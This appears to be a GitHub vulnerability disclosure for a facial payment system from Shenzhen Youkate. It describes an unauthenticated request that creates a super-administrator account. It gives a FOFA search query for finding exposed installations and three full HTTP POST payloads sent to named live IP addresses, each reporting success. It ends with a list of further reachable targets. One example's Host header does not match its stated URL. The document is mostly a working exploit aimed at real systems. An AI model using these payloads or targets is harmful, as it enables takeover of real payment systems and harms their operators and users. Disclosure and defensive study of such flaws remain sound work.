Skip to content

Latest commit

 

History

History
95 lines (85 loc) · 6.56 KB

Shenzhen Youkate Industrial Co., Ltd.md

File metadata and controls

95 lines (85 loc) · 6.56 KB

Unauthorized creation of super administrator account exists in Facial Love Cloud Facial Payment System Procedure

official website: http://www.szjocat.com/# image.png Version: All versions of this product

Function point: Add super administrator option for personnel management in the system management center module

FOFA syntax

icon_hash="241050903" && ip!="101.200.146.70"

Instance reproduction1:

 http://140.210.211.116:1040/Login.aspx

Unauthorized creation of super administrator account, sending the following data packet with a status code of 200, and successfully creating user EDUSRC/edu123456

POST /SystemMng.ashx HTTP/1.1
Host: 140.210.211.116:1040
Content-Length: 176
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://140.210.211.116:1040
Referer: http://140.210.211.116:1040/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

operatorName=EDUSRC&operatorPwd=edu123456&operpassword=123&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

Instance reproduction2:

 http://140.210.211.116:1200/Login.aspx

Unauthorized creation of super administrator account, sending the following data packet with a status code of 200, and successfully creating user EDUSRC/edu123456

POST /SystemMng.ashx HTTP/1.1
Host: 140.210.211.116:1040
Content-Length: 176
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://140.210.211.116:1040/Login.aspx
Referer: http://140.210.211.116:1040/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

operatorName=EDUSRC&operatorPwd=edu123456&operpassword=123&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

Instance reproduction3:

 http://116.63.182.155:1000/Login.aspx

Unauthorized creation of super administrator account, sending the following data packet with a status code of 200, and successfully creating user EDUSRC/edu123456

POST /SystemMng.ashx HTTP/1.1
Host: 116.63.182.155:1000
Content-Length: 176
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://116.63.182.155:1000
Referer: http://116.63.182.155:1000/View/SystemMng/OperatorMng.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

operatorName=EDUSRC&operatorPwd=edu123456&operpassword=123&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

Other examples: http://1.15.20.244:1000/Login.aspx http://8.134.140.252:1200/Login.aspx http://221.233.243.136:1000/Login.aspx http://ytwl.rlyzf.com:2000/Login.aspx http://101.34.53.232:898/Login.aspx http://140.210.211.116:1040/Login.aspx http://47.119.159.94:1000/Login.aspx